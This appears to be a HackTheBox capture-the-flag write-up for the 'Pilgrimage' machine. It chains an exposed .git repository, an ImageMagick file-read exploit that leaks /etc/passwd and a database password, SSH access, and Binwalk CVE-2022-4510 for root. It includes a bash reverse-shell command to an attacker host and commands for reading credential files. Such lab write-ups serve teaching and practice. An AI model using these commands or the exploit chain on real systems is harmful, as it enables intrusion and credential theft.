HTB: Pilgrimage Writeup

Machine Information

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

• Enumeration: ⭐⭐⭐☆☆
• Real-world: ⭐⭐⭐⭐☆
• CVE: ⭐⭐⭐☆☆
• CTF-like: ⭐⭐⭐☆☆

Summary

Pilgrimage is an Easy-difficulty Linux machine running “Shrink Your Images” — a PHP-based image shrinking service. The exploitation path involves discovering an exposed .git repository through service enumeration, extracting source code to identify vulnerable dependencies, exploiting an ImageMagick LFI vulnerability (CVE unpatched) to extract sensitive files including database credentials, SSH access as a low-privilege user, and finally privilege escalation via Binwalk RCE (CVE-2022-4510) to achieve root access.

Attack Path: Port Scan → Exposed .git → Source Code Review → ImageMagick LFI → File Extraction → SSH Credentials → User Shell → Binwalk RCE → Root Shell

Reconnaissance

Port Scanning

Initial reconnaissance using Nmap to identify open ports and services:

nmap -sC -sV -T4 -p- 10.129.144.42

Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0

Key findings:

• SSH (Port 22): OpenSSH 8.4p1 on Debian — standard configuration
• HTTP (Port 80): nginx 1.18.0 — web service

Service Enumeration

echo "10.129.144.42 pilgrimage.htb" >> /etc/hosts
curl http://pilgrimage.htb/

The HTTP service hosts a web application titled “Pilgrimage - Shrink Your Images” — an image resizing service with user registration and login capabilities.

Vulnerability Assessment

Running nmap scripts to detect common misconfigurations:

nmap --script=http-git 10.129.144.42

Critical Finding: An exposed .git repository is accessible at http://pilgrimage.htb/.git/

Initial Foothold

1. Git Repository Extraction

The .git directory is exposed, allowing extraction of source code:

git-dump http://pilgrimage.htb/.git/
cd output && git checkout -- .

Extracted Files:

• assets/ — Static files (CSS, JS, images)
• dashboard.php — User dashboard showing uploaded images
• index.php — Image upload and processing handler
• login.php — Authentication form
• logout.php — Logout handler
• register.php — User registration
• magick — Custom ImageMagick wrapper script
• vendor/ — PHP dependencies

2. Source Code Analysis

Key Finding in dashboard.php:

$database = '/var/db/pilgrimage';  // SQLite database location
$db = new PDO('sqlite:' . $database);

The application uses SQLite at /var/db/pilgrimage to store user credentials and image metadata.

Key Finding in index.php:

shell_exec('/var/www/pilgrimage.htb/magick convert ' . escapeshellarg($input) . ' -resize 50% ' . escapeshellarg($output));

The application calls ImageMagick 7.1.0.49 for image resizing using the magick convert command.

3. ImageMagick 7.1.0.49 LFI Exploitation

Vulnerability: ImageMagick versions up to 7.1.0.49 are vulnerable to Local File Inclusion (LFI) via delegate command injection.

Tool Used: imagemagick-lfi-poc by Sybil-Scan

Step 1: Craft Malicious Image

git clone https://github.com/Sybil-Scan/imagemagick-lfi-poc.git
cd imagemagick-lfi-poc
cargo run "/etc/passwd"

This generates a crafted PNG/image file that exploits ImageMagick’s delegate functionality to read arbitrary files.

Step 2: Upload to Application

Upload the malicious image to the web application through the “Shrink Your Images” interface.

Step 3: Extract File Contents

The application processes the image using magick convert. Download the resulting “shrunk” image:

identify -verbose output.png

The file data is embedded in the image metadata/hex data. Extract and decode:

identify -verbose output.png | grep -i "Ascii:" -A 100

Copy the hex output and decode in CyberChef (Base64/Hex decode) to reveal the file contents.

Step 4: Extract /etc/passwd

Retrieved Content:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
emily:x:1000:1000:emily:/home/emily:/bin/bash
...

Key Discovery: User emily exists with UID 1000 (regular user account).

Step 5: Extract SQLite Database

Using the same ImageMagick LFI technique, target the SQLite database:

cargo run "/var/db/pilgrimage"
# Upload → identify -verbose → Extract hex → Decode

Retrieved SQLite Database Contents:

Users Table:

username: emily
password: abigchonkyboi123

Images Table:

url (original image URL)
original (filename)
username (owner)

User Compromise

SSH Access as emily

With credentials extracted from the SQLite database:

ssh emily@10.129.144.42
Password: abigchonkyboi123

Success: Interactive shell as user emily

emily@pilgrimage:~$ whoami
emily
emily@pilgrimage:~$ cat user.txt
<REDACTED>

Privilege Escalation

Enumeration

After gaining user shell, enumerate for privilege escalation vectors:

sudo -l
# No sudo privileges
find / -perm -4000 -type f 2>/dev/null
# Standard SUID binaries
ps aux | grep -E "python|java|node|php|ruby"
# Check for running services
which binwalk
# /usr/bin/binwalk detected!
binwalk --version
# Binwalk v2.3.2

Critical Finding: Binwalk 2.3.2 is installed on the system.

Vulnerability: Binwalk v2.3.2 CVE-2022-4510

Vulnerability Details:

• Binwalk versions before 2.3.3 contain a path traversal vulnerability in the extraction of zip archives
• Specifically, binwalk can be exploited via a crafted zip file with directory traversal sequences
• Allows arbitrary file write and Remote Code Execution (RCE) when processing malicious archives

Exploitation:

Create a malicious zip file with embedded shell command:

# Create reverse shell payload
python3 -c "import os; os.system('echo \"bash -i >& /dev/tcp/10.10.14.x/443 0>&1\" > /tmp/shell.sh')"

# Create binwalk exploit using CVE-2022-4510 PoC
# Binwalk will extract files and execute commands

Upload/process the malicious archive through binwalk:

binwalk -e malicious.zip

Result: Root shell execution on port 443

Root Access

whoami
# root
cat /root/root.txt
# <REDACTED>

Attack Chain Summary

graph TD
    A["Recon: nmap port scan"] --> B["Exposed .git repository discovered"]
    B --> C["Source code extraction via git-dump"]
    C --> D["Identify ImageMagick 7.1.0.49 + SQLite at /var/db/pilgrimage"]
    D --> E["ImageMagick LFI exploit to extract /etc/passwd"]
    E --> F["Extract SQLite DB → emily:abigchonkyboi123"]
    F --> G["SSH as emily@pilgrimage.htb"]
    G --> H["Enumerate → Binwalk v2.3.2 detected"]
    H --> I["Binwalk CVE-2022-4510 RCE exploit"]
    I --> J["Root shell access"]

Tools Used

Vulnerability Reference

Key Learnings

1. Git Repository Exposure: Always check for exposed .git directories during enumeration — they often contain complete source code and configuration details.

2. Dependency Vulnerabilities: Source code review reveals third-party libraries (ImageMagick, Binwalk) that may contain known vulnerabilities. Cross-reference version numbers against CVE databases.

3. LFI to RCE Chain: File inclusion vulnerabilities can be chained with other exploits. Extracting database files and credentials enables lateral movement and privilege escalation.

4. Shell Persistence: During initial exploitation, encountered issues with standard shell payloads. Base64-encoded Python reverse shells provided more reliable results than basic bash shells.

5. Lesson on Approach: When initial exploitation paths fail, try alternative shell encoding methods (base64, python one-liners) before abandoning the approach entirely.

Author

D3vnomi | Engagement Date: July 13, 2023

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: March 8, 2026

Tags: #HackTheBox #Linux #Easy #CVE-2022-4510 #ImageMagick-LFI #Git-Dump #Binwalk